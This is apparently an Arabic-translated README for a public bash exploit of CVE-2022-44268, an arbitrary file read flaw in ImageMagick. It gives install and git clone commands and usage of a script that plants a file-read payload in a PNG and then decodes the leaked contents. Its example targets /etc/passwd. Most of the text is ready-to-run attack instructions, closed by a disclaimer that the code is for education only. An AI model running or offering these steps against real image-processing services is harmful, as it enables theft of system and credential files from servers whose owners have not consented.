
نص برمجي بلغة bash لاستغلال ثغرة قراءة الملفات التعسفية في ImageMagick بسهولة CVE-2022-44268
نص برمجي بلغة bash لاستغلال ثغرة قراءة الملفات التعسفية في ImageMagick بسهولة CVE-2022-44268
Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org
Copyright: (C) 1999-2021 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC Modules OpenMP(4.5)
Delegates (built-in): bzlib djvu fftw fontconfig freetype heic jbig jng jp2 jpeg lcms lqr ltdl lzma openexr pangocairo png tiff webp wmf x xml zlib
sudo apt-get install imagemagick exiftool pngcrush exiv2 -y
git clone https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268.git
cd Exploit-for-ImageMagick-CVE-2022-44268
chmod 750 script.sh
./script.sh -p [Path to Read] [PNG Image] [Output[Optional, if not used defaults to pngout.png]]
./script.sh -d [PNG]
Examples
./script.sh -p /etc/passwd sample.png output.png
./script.sh -d pngout.png
Options
-h = Show help
-p = Add the exploit to a PNG image
-d = Extract and decode the read file
جميع التعليمات البرمجية المقدمة في هذا المستودع مخصصة للأغراض التعليمية/البحثية فقط. أي إجراءات و/أو أنشطة تتعلق بالمحتوى الموجود داخل هذا المستودع تقع على مسؤوليتك وحدك. يمكن أن يؤدي إساءة استخدام التعليمات البرمجية في هذا المستودع إلى توجيه تهم جنائية للأشخاص المعنيين. لن يتحمل المؤلف المسؤولية في حال تم توجيه أي تهم جنائية ضد أي أفراد يسيئون استخدام التعليمات البرمجية في هذا المستودع لخرق القانون.